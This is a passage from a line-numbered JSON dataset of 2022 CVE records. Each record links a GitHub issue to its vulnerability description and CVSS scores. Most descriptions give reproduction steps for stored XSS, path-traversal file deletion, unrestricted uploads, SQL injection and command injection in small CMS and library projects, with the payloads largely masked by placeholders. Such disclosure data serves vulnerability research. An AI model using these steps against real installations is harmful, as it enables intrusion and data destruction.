  82259. "description": "There is a stored xss vulnerability here: APITAG Vulnerability PATHTAG FILETAG Vulnerability to reproduce: APITAG url: URLTAG \uff0cuse the post method to pass in parameter values\uff0cthe specific operation screenshots are as follows: FILETAG APITAG background address: URLTAG \uff0cyou can see the success popup FILETAG Or you can log in to the background, click Extension Tools, and then click Message Management\uff0ca popup will appear next FILETAG Repair suggestion: Use php built in functions such as htmlspecialchars to filter xss vulnerabilities",
  82260. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82261. "severity": "MEDIUM",
  82262. "baseScore": 5.4,
  82263. "impactScore": 2.7,
  82264. "exploitabilityScore": 2.3
  82265. },
  82266. {
  82267. "CVE_ID": "CVE-2022-28523",
  82268. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/17",
  82269. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/17",
  82270. "Repo_new": "neeke/hongcms",
  82271. "Issue_Created_At": "2022-03-31T09:16:53Z",
  82272. "description": "There is an arbitrary file deletion vulnerability here: PATHTAG Vulnerability file: PATHTAG The vulnerability code is as follows: FILETAG Arbitrary file deletion vulnerability could lead to system reinstallation Vulnerability to reproduce: APITAG log in to the background to get cookies APITAG of the code in the FILETAG file is as follows: the following code means that the system can be reinstalled as long as the FILETAG file is deleted APITAG APITAG . 'config/ FILETAG '); if(defined('SYSDIR')){ echo ' APITAG APITAG APITAG APITAG APITAG APITAG APITAG echo $footer; APITAG } APITAG APITAG the packet that deletes the config.php file as follows: APITAG POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Referer: URLTAG Content Length NUMBERTAG Cookie: APITAG DNT NUMBERTAG Connection: close PATHTAG APITAG Repair suggestion: APITAG ../ or ..\\\\ in file variables APITAG allow files in the specified directory to be deleted",
  82273. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  82274. "severity": "HIGH",
  82275. "baseScore": 8.1,
  82276. "impactScore": 5.2,
  82277. "exploitabilityScore": 2.8
  82278. },
  82279. {
  82280. "CVE_ID": "CVE-2022-28525",
  82281. "Issue_Url_old": "https://github.com/chilin89117/ED01-CMS/issues/5",
  82282. "Issue_Url_new": "https://github.com/chilin89117/ed01-cms/issues/5",
  82283. "Repo_new": "chilin89117/ED01-CMS",
  82284. "Issue_Created_At": "2022-03-31T14:25:34Z",
  82285. "description": "There is a file upload vulnerability here: APITAG Vulnerability file: PATHTAG FILETAG Vulnerability to reproduce: APITAG in to the background, then visit the url: URLTAG The operation is shown in the following figure: FILETAG APITAG url: FILETAG FILETAG Repair suggestion: Only jpg\u3001jpeg,\u3001png files are allowed to be uploaded",
  82286. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  82287. "severity": "HIGH",
  82288. "baseScore": 8.8,
  82289. "impactScore": 5.9,
  82290. "exploitabilityScore": 2.8
  82291. },
  82292. {
  82293. "CVE_ID": "CVE-2022-28527",
  82294. "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/5",
  82295. "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/5",
  82296. "Repo_new": "shaogongbra/dhcms",
  82297. "Issue_Created_At": "2022-04-01T08:51:20Z",
  82298. "description": "There is an arbitrary folder deletion vulnerability PATHTAG Vulnerability file: PATHTAG You can see that the following code does not filter ../ or ..\\\\, it just filters . or .., which will cause any folder to be deleted FILETAG Vulnerability to reproduce: APITAG in to the backend first APITAG the packet as follows: APITAG POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Referer: URLTAG Content Length NUMBERTAG Cookie: APITAG DNT NUMBERTAG Connection: close APITAG APITAG You can see that the page shows that the file was deleted successfully FILETAG Repair suggestion: filter ../ or ..\\\\",
  82299. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  82300. "severity": "HIGH",
  82301. "baseScore": 8.1,
  82302. "impactScore": 5.2,
  82303. "exploitabilityScore": 2.8
  82304. },
  82305. {
  82306. "CVE_ID": "CVE-2022-28528",
  82307. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/14",
  82308. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/14",
  82309. "Repo_new": "alexlang24/bloofoxcms",
  82310. "Issue_Created_At": "2022-04-01T16:12:30Z",
  82311. "description": "There is a file upload vulnerability here: APITAG Vulnerability file: FILETAG You can see that the file is uploaded directly without the verification file suffix. FILETAG Vulnerability to reproduce: APITAG log in to the backend of the website APITAG url: URLTAG . Then operate as shown below: FILETAG APITAG can see that FILETAG is successfully uploaded FILETAG APITAG FILETAG and execute the code to get phpinfo information FILETAG Repair suggestion: Set the upload whitelist and limit the suffixes of uploaded files to gif, jpg, and png",
  82312. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  82313. "severity": "HIGH",
  82314. "baseScore": 8.8,
  82315. "impactScore": 5.9,
  82316. "exploitabilityScore": 2.8
  82317. },
  82318. {
  82319. "CVE_ID": "CVE-2022-28552",
  82320. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/10",
  82321. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/10",
  82322. "Repo_new": "chshcms/cscms",
  82323. "Issue_Created_At": "2022-01-18T08:12:55Z",
  82324. "description": "Cscms NUMBERTAG has sqlinjection. Log in to the background, open the song module, create a new song, delete it to the recycle bin, and SQL injection security problems will occur when emptying the recycle bin. CODETAG FILETAG CODETAG FILETAG CODETAG FILETAG FILETAG PATHTAG FILETAG",
  82325. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  82326. "severity": "HIGH",
  82327. "baseScore": 8.8,
  82328. "impactScore": 5.9,
  82329. "exploitabilityScore": 2.8
  82330. },
  82331. {
  82332. "CVE_ID": "CVE-2022-28585",
  82333. "Issue_Url_old": "https://github.com/leadscloud/EmpireCMS/issues/5",
  82334. "Issue_Url_new": "https://github.com/leadscloud/empirecms/issues/5",
  82335. "Repo_new": "leadscloud/empirecms",
  82336. "Issue_Created_At": "2022-04-01T08:10:06Z",
  82337. "description": "APITAG NUMBERTAG has sql injection vulnerability. Brief of this vulnerability APITAG NUMBERTAG has sql injection vulnerability in adding advertisement category Test Environment Windows NUMBERTAG PHP APITAG Affect version APITAG NUMBERTAG ulnerable Code PATHTAG line NUMBERTAG The variable $add passed in by the APITAG function is inserted into the sql statement without any filtering, resulting in a sql injection vulnerability FILETAG Vulnerability display First enter the background FILETAG Click as shown,go to the ad management module FILETAG Click to add and capture the packet FILETAG FILETAG Modify parameters APITAG or APITAG or ' FILETAG Successfully obtained the database version number",
  82338. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82339. "severity": "CRITICAL",
  82340. "baseScore": 9.8,
  82341. "impactScore": 5.9,
  82342. "exploitabilityScore": 3.9
  82343. },
  82344. {
  82345. "CVE_ID": "CVE-2022-28586",
  82346. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/63",
  82347. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/63",
  82348. "Repo_new": "havok89/hoosk",
  82349. "Issue_Created_At": "2022-04-01T05:25:15Z",
  82350. "description": "XSS on Hoosk NUMBERTAG This vulnerability in edit page function FILETAG Exploit with using \"heading\" attribute, we can custom HTML tag lead to inject img tag with ERRORTAG event, and use HTML encoding to bypass filter some special chars FILETAG APITAG FILETAG",
  82351. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82352. "severity": "MEDIUM",
  82353. "baseScore": 6.1,
  82354. "impactScore": 2.7,
  82355. "exploitabilityScore": 2.8
  82356. },
  82357. {
  82358. "CVE_ID": "CVE-2022-28588",
  82359. "Issue_Url_old": "https://github.com/lkmc2/SpringBootMovie/issues/3",
  82360. "Issue_Url_new": "https://github.com/lkmc2/springbootmovie/issues/3",
  82361. "Repo_new": "lkmc2/springbootmovie",
  82362. "Issue_Created_At": "2022-04-01T09:38:04Z",
  82363. "description": "\u4e00\u4e2a\u540e\u53f0\u5b58\u50a8\u578bxss\u6f0f\u6d1e. When adding movie names, malicious code can be stored because there is no filtering of parameters Affected version NUMBERTAG test\uff1a FILETAG The trigger\uff1a FILETAG The main reason is that the code does not filter parameter values\uff1a FILETAG",
  82364. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82365. "severity": "MEDIUM",
  82366. "baseScore": 5.4,
  82367. "impactScore": 2.7,
  82368. "exploitabilityScore": 2.3
  82369. },
  82370. {
  82371. "CVE_ID": "CVE-2022-28589",
  82372. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/23",
  82373. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/23",
  82374. "Repo_new": "pixelimity/pixelimity",
  82375. "Issue_Created_At": "2022-04-01T13:22:07Z",
  82376. "description": "Cross Site Scripting (XSS) in APITAG A Cross Site Scripting vulnerabilty exists in Pixelimity via the Page Title field in PATHTAG Step to exploit NUMBERTAG Login as admin NUMBERTAG Navigate to FILETAG and click on Add New NUMBERTAG Insert XSS payload ( APITAG alert NUMBERTAG APITAG ) in the APITAG field and click on Publish Page. FILETAG FILETAG Proof of concept APITAG APITAG alert NUMBERTAG APITAG",
  82377. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  82378. "severity": "MEDIUM",
  82379. "baseScore": 4.8,
  82380. "impactScore": 2.7,
  82381. "exploitabilityScore": 1.7
  82382. },
  82383. {
  82384. "CVE_ID": "CVE-2022-28590",
  82385. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/24",
  82386. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/24",
  82387. "Repo_new": "pixelimity/pixelimity",
  82388. "Issue_Created_At": "2022-04-02T10:07:05Z",
  82389. "description": "A Remote Code Execution (RCE) vulnerability exists in pixelimity via admin/admin APITAG A Remote Code Execution (RCE) vulnerability exists in pixelimity via admin/admin APITAG Step to exploit NUMBERTAG Login as admin NUMBERTAG Navigate to FILETAG NUMBERTAG Compress APITAG to APITAG file and then upload via Install New Theme NUMBERTAG isit FILETAG FILETAG FILETAG FILETAG",
  82390. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  82391. "severity": "HIGH",
  82392. "baseScore": 7.2,
  82393. "impactScore": 5.9,
  82394. "exploitabilityScore": 1.2
  82395. },
  82396. {
  82397. "CVE_ID": "CVE-2022-28599",
  82398. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/595",
  82399. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/595",
  82400. "Repo_new": "daylightstudio/fuel-cms",
  82401. "Issue_Created_At": "2022-04-02T09:29:18Z",
  82402. "description": "A stored cross site scripting (XSS) vulnerability exists in FUEL CMS NUMBERTAG A stored cross site scripting (XSS) vulnerability exists in FUEL CMS NUMBERTAG that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack NUMBERTAG login as admin .in the Assets page FILETAG NUMBERTAG upload the malicious pdf. the content of FILETAG : CODETAG FILETAG NUMBERTAG back to Assets then we can see xss cookie.svg have been upload: FILETAG NUMBERTAG when user click the FILETAG it will trigger a XSS attack FILETAG",
  82403. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82404. "severity": "MEDIUM",
  82405. "baseScore": 5.4,
  82406. "impactScore": 2.7,
  82407. "exploitabilityScore": 2.3
  82408. },
  82409. {
  82410. "CVE_ID": "CVE-2022-28918",
  82411. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/116",
  82412. "Issue_Url_new": "https://github.com/greencms/greencms/issues/116",
  82413. "Repo_new": "greencms/greencms",
  82414. "Issue_Created_At": "2022-04-04T10:10:50Z",
  82415. "description": "There is an arbitrary file deletion vulnerability here: APITAG Vulnerability file: PATHTAG FILETAG Vulnerability to reproduce: APITAG log in to the background APITAG url: URLTAG APITAG delete the NUMBERTAG folder in the root directory\uff0cconstruct the packet as follows: APITAG GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG Repair suggestion: APITAG ../ and ..\\\\ APITAG the range of files to delete",
  82416. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  82417. "severity": "HIGH",
  82418. "baseScore": 8.1,
  82419. "impactScore": 5.2,
  82420. "exploitabilityScore": 2.8
  82421. },
  82422. {
  82423. "CVE_ID": "CVE-2022-28919",
  82424. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/3651",
  82425. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/3651",
  82426. "Repo_new": "dokuwiki/dokuwiki",
  82427. "Issue_Created_At": "2022-03-30T10:23:12Z",
  82428. "description": "Possible XSS vulnerability. Hello, I would like to report for possible XSS vulnerability. The source in this file FILETAG Line NUMBERTAG in function APITAG While the sink in this FILETAG line NUMBERTAG I tried to test the pathinfo function in PHP. And I found it is possible to bypass this function with this example. ERRORTAG",
  82429. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82430. "severity": "MEDIUM",
  82431. "baseScore": 6.1,
  82432. "impactScore": 2.7,
  82433. "exploitabilityScore": 2.8
  82434. },
  82435. {
  82436. "CVE_ID": "CVE-2022-28920",
  82437. "Issue_Url_old": "https://github.com/MoeNetwork/Tieba-Cloud-Sign/issues/156",
  82438. "Issue_Url_new": "https://github.com/moenetwork/tieba-cloud-sign/issues/156",
  82439. "Repo_new": "moenetwork/tieba-cloud-sign",
  82440. "Issue_Created_At": "2022-04-06T12:16:33Z",
  82441. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file FILETAG line NUMBERTAG APITAG Then, there is an echo in line NUMBERTAG APITAG strip_tags is not secure in this case. If you can look to this code example the alert will be printed when you press on the link. APITAG",
  82442. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  82443. "severity": "MEDIUM",
  82444. "baseScore": 4.8,
  82445. "impactScore": 2.7,
  82446. "exploitabilityScore": 1.7
  82447. },
  82448. {
  82449. "CVE_ID": "CVE-2022-28936",
  82450. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2307",
  82451. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2307",
  82452. "Repo_new": "fisco-bcos/fisco-bcos",
  82453. "Issue_Created_At": "2022-03-28T12:35:44Z",
  82454. "description": "A malicious node may fake a proposal's header when he is the leader and some transactions cannot be processed. Describe the bug I setup a group of NUMBERTAG nodes under NUMBERTAG rc2 version. One of the nodes is a malicious one and tries to modify some fields when it sends out some packages. Then I use the following command to test the system: APITAG Then some transactions cannot be processed successfully. To Reproduce Steps to reproduce the behavior NUMBERTAG setup a NUMBERTAG nodes group NUMBERTAG start the press test program NUMBERTAG See the error Expected behavior All the transactions should be processed correctly. Screenshots The information of the log: APITAG Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG rc2",
  82455. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82456. "severity": "HIGH",
  82457. "baseScore": 7.5,
  82458. "impactScore": 3.6,
  82459. "exploitabilityScore": 3.9
  82460. },
  82461. {
  82462. "CVE_ID": "CVE-2022-28937",
  82463. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2312",
  82464. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2312",
  82465. "Repo_new": "fisco-bcos/fisco-bcos",
  82466. "Issue_Created_At": "2022-03-29T03:14:29Z",
  82467. "description": "A malicious node becomes a leader and set the view to a very large one, blocks cannot be processed. Describe the bug I setup a group with NUMBERTAG nodes. One of them are malicious one. First, the malicious node starts, and after that all the other nodes start. Then I start the press testing program to send transactions to the group. And it stuck here: APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG setup NUMBERTAG nodes NUMBERTAG start press testing program NUMBERTAG the bug occurs Expected behavior The system should not stuck and keep changing the view. Screenshots APITAG APITAG Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG rc2 Additional context There maybe an integer overflow during the viewchange and the malicious node can always be the leader.",
  82468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82469. "severity": "HIGH",
  82470. "baseScore": 7.5,
  82471. "impactScore": 3.6,
  82472. "exploitabilityScore": 3.9
  82473. },
  82474. {
  82475. "CVE_ID": "CVE-2022-28945",
  82476. "Issue_Url_old": "https://github.com/WeBankPartners/wecube-platform/issues/2324",
  82477. "Issue_Url_new": "https://github.com/webankpartners/wecube-platform/issues/2324",
  82478. "Repo_new": "webankpartners/wecube-platform",
  82479. "Issue_Created_At": "2022-05-30T07:34:35Z",
  82480. "description": "zip slip . \u89e3\u538b\u6587\u4ef6\u65f6\u672a\u5bf9 ../ \u8fdb\u884c\u6821\u9a8c Demo\uff1a ERRORTAG",
  82481. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82482. "severity": "CRITICAL",
  82483. "baseScore": 9.8,
  82484. "impactScore": 5.9,
  82485. "exploitabilityScore": 3.9
  82486. },
  82487. {
  82488. "CVE_ID": "CVE-2022-28948",
  82489. "Issue_Url_old": "https://github.com/go-yaml/yaml/issues/666",
  82490. "Issue_Url_new": "https://github.com/go-yaml/yaml/issues/666",
  82491. "Repo_new": "go-yaml/yaml",
  82492. "Issue_Created_At": "2020-10-21T17:29:20Z",
  82493. "description": "NUMBERTAG panic \"attempted to parse unknown event (please report): none\". Hi folks \ud83d\udc4b\ud83c\udffb Found this panic (along with NUMBERTAG while fuzzing my own project. Minimal example of the panic ( URLTAG ERRORTAG Output: ERRORTAG",
  82494. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  82495. "severity": "HIGH",
  82496. "baseScore": 7.5,
  82497. "impactScore": 3.6,
  82498. "exploitabilityScore": 3.9
  82499. },
  82500. {
  82501. "CVE_ID": "CVE-2022-28966",
  82502. "Issue_Url_old": "https://github.com/wasm3/wasm3/issues/320",
  82503. "Issue_Url_new": "https://github.com/wasm3/wasm3/issues/320",
  82504. "Repo_new": "wasm3/wasm3",
  82505. "Issue_Created_At": "2022-04-07T06:41:07Z",
  82506. "description": "FILETAG ERRORTAG",
  82507. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  82508. "severity": "MEDIUM",
  82509. "baseScore": 5.5,
  82510. "impactScore": 3.6,
  82511. "exploitabilityScore": 1.8
  82512. },
  82513. {
  82514. "CVE_ID": "CVE-2022-28985",
  82515. "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1217",
  82516. "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1217",
  82517. "Repo_new": "orangehrm/orangehrm",
  82518. "Issue_Created_At": "2022-04-07T12:40:53Z",
  82519. "description": "Stored XSS in APITAG Status\" section under APITAG via the GET/POST parameters APITAG and APITAG . Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug Insufficient input validation in Buzz APITAG API results in Stored Cross Site Scripting attack. An attacker who is an authenticated user can craft a malicious request causing malicious Javascript to execute in the browser of any other user. The malicious Javascript can trigger when a victim user visits the Buzz page. To Reproduce NUMBERTAG Authenticate to the user dashboard NUMBERTAG isit APITAG page NUMBERTAG Collect the CSRF token from the HTML response. It can be found in an 'input' field with the id APITAG . Example : APITAG NUMBERTAG Collect the logged in user cookie APITAG NUMBERTAG Fire the following POST request including the CSRF token and cookie obtained. Replace the Host header too : CODETAG NUMBERTAG Click on the link 'xss' in the most recent post. Expected behavior The value of parameters APITAG and APITAG should be validated by API and an error should be thrown. What do you see instead: The malicious payload gets submitted successfully and get's stored in the posting made by the user. Screenshots FILETAG FILETAG Technical Details A logged in user can post status updates to their buzz feed. From the front end application a user will be able to post a text within a single field which says APITAG on your mind\" to the buzz feed. This happens via a POST request to the URL APITAG through the APITAG request body parameter. While investigating this API, we found that there are extra parameter fields in the body of this API which is not directly exposed through the frontend application. The following request body parameters found in the API results certain profound effects in the HTML response sent by server NUMBERTAG APITAG Causes the addition of an APITAG anchor tag in response with id APITAG & with attribute src with the value set for APITAG parameter NUMBERTAG APITAG Causes an APITAG anchor tag in response with id APITAG which is click able and displayed with the text content sent in the above request parameter. Combining the above NUMBERTAG parameters, it's possible to get an anchor HTML tag with a visible clickable text and a desired URL as src which is clickable. The URL payload could be javascript as APITAG . This can result in execution of arbitrary malicious javascript code on the client side if the victim clicks on this link. The impact of this can be severe since this particular code gets stored in the database and gets delivered to the feed of every logged in user in APITAG Every user will have this delivered through their APITAG feed. In terms of impact, this vulnerability enables an attacker to stealing CSRF token and perform arbitrary actions on the website on behalf of the victim user.",
  82520. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  82521. "severity": "MEDIUM",
  82522. "baseScore": 5.4,
  82523. "impactScore": 2.7,
  82524. "exploitabilityScore": 2.3
  82525. },
  82526. {
  82527. "CVE_ID": "CVE-2022-28995",
  82528. "Issue_Url_old": "https://github.com/zongdeiqianxing/rengine/issues/1",
  82529. "Issue_Url_new": "https://github.com/zongdeiqianxing/rengine/issues/1",
  82530. "Repo_new": "zongdeiqianxing/rengine",
  82531. "Issue_Created_At": "2022-04-08T01:48:22Z",
  82532. "description": "URLTAG rce report. URLTAG Hello, I found that there is an rce vulnerability in the yaml configuration function in the rengine NUMBERTAG ersion. The yaml file can be written arbitrarily, and the background code does not verify and filter it directly into the os.system statement, which leads to this vulnerability. Take 'dirsearch as an example . FILETAG FILETAG FILETAG ============== It should be noted that the program must scan subdomains by default before performing dirsearch scanning, so you need to wait for a while when trying to exploit rce FILETAG FILETAG FILETAG FILETAG",
  82533. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82534. "severity": "CRITICAL",
  82535. "baseScore": 9.8,
  82536. "impactScore": 5.9,
  82537. "exploitabilityScore": 3.9
  82538. },
  82539. {
  82540. "CVE_ID": "CVE-2022-29001",
  82541. "Issue_Url_old": "https://github.com/lkmc2/SpringBootMovie/issues/4",
  82542. "Issue_Url_new": "https://github.com/lkmc2/springbootmovie/issues/4",
  82543. "Repo_new": "lkmc2/springbootmovie",
  82544. "Issue_Created_At": "2022-04-08T08:49:20Z",
  82545. "description": "Arbitrary file upload vulnerability. Affected version NUMBERTAG Upload a compromised file with the suffix .php FILETAG Published successfully FILETAG Vulnerable code\uff1a FILETAG The reason for the vulnerability is that the file suffix is not filtered here",
  82546. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  82547. "severity": "HIGH",
  82548. "baseScore": 7.2,
  82549. "impactScore": 5.9,
  82550. "exploitabilityScore": 1.2
  82551. },
  82552. {
  82553. "CVE_ID": "CVE-2022-29017",
  82554. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/691",
  82555. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/691",
  82556. "Repo_new": "axiomatic-systems/bento4",
  82557. "Issue_Created_At": "2022-04-10T14:50:23Z",
  82558. "description": "APITAG SEGV PATHTAG . SUMMARY: APITAG SEGV PATHTAG Version CODETAG branch NUMBERTAG d8e1fc Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks !!",
  82559. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  82560. "severity": "MEDIUM",
  82561. "baseScore": 5.5,
  82562. "impactScore": 3.6,
  82563. "exploitabilityScore": 1.8
  82564. },
  82565. {
  82566. "CVE_ID": "CVE-2022-29020",
  82567. "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/76",
  82568. "Issue_Url_new": "https://github.com/saysky/forestblog/issues/76",
  82569. "Repo_new": "saysky/forestblog",
  82570. "Issue_Created_At": "2022-04-10T10:25:04Z",
  82571. "description": "XSS attacks occur when user profile pictures are updated. APITAG user information and save it FILETAG APITAG profile picture address in the packet capture request is changed",
  82572. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  82573. "severity": "MEDIUM",
  82574. "baseScore": 6.1,
  82575. "impactScore": 2.7,
  82576. "exploitabilityScore": 2.8
  82577. },
  82578. {
  82579. "CVE_ID": "CVE-2022-29080",
  82580. "Issue_Url_old": "https://github.com/barneycarroll/npm-dependency-versions/issues/6",
  82581. "Issue_Url_new": "https://github.com/barneycarroll/npm-dependency-versions/issues/6",
  82582. "Repo_new": "barneycarroll/npm-dependency-versions",
  82583. "Issue_Created_At": "2022-04-06T19:49:43Z",
  82584. "description": "Potential command injection vulnerability in npm dependency versions. Hi, Thanks for devloping this great npm package! We find a potential command injection vulnerabilty from it. The bug is caused by the fact that package exported method fail to sanitize pkgs parameter and let it flow into a sensitive command execution API. Here is the proof of concept. APITAG Please consider fix it. thanks!",
  82585. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  82586. "severity": "CRITICAL",
  82587. "baseScore": 9.8,
  82588. "impactScore": 5.9,
  82589. "exploitabilityScore": 3.9
  82590. },
  82591. {
  82592. "CVE_ID": "CVE-2022-29185",
  82593. "Issue_Url_old": "https://github.com/constantoine/totp-rs/issues/13",
  82594. "Issue_Url_new": "https://github.com/constantoine/totp-rs/issues/13",
  82595. "Repo_new": "constantoine/totp-rs",
  82596. "Issue_Created_At": "2022-04-24T07:41:34Z",
  82597. "description": "Unsafe token check. Currently, a simple string comparison in the check method is used to validate the token. To resist timing attack, we need to use constant time comparison algorithm. Details URLTAG",
  82598. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N",
  82599. "severity": "MEDIUM",
  82600. "baseScore": 4.4,
  82601. "impactScore": 3.6,
  82602. "exploitabilityScore": 0.7
  82603. },
  82604. {
  82605. "CVE_ID": "CVE-2022-29202",
  82606. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/55199",
  82607. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/55199",
  82608. "Repo_new": "tensorflow/tensorflow",
  82609. "Issue_Created_At": "2022-03-11T09:56:38Z",
  82610. "description": "Missing input validation on APITAG . APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: APITAG installed from (source or binary): APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): APITAG version (if compiling from source): APITAG version: using a colab notebook GPU model and memory: using a colab notebook You can collect some of this information using our environment capture FILETAG You can also obtain the APITAG version with NUMBERTAG TF NUMBERTAG APITAG NUMBERTAG TF NUMBERTAG APITAG Describe the current behavior All RAM is consumed, causing the notebook to crash Describe the expected behavior Some input validation should be done and an exception thrown. Contributing URLTAG Do you want to contribute a PR? (yes/no): Briefly describe your candidate solution(if contributing): Standalone code to reproduce the issue Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to PATHTAG notebook. The colab notebook: URLTAG APITAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached.",
  82611. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  82612. "severity": "MEDIUM",
  82613. "baseScore": 5.5,
  82614. "impactScore": 3.6,
  82615. "exploitabilityScore": 1.8
  82616. },
  82617. {
  82618. "CVE_ID": "CVE-2022-29211",
  82619. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/45770",
  82620. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/45770",
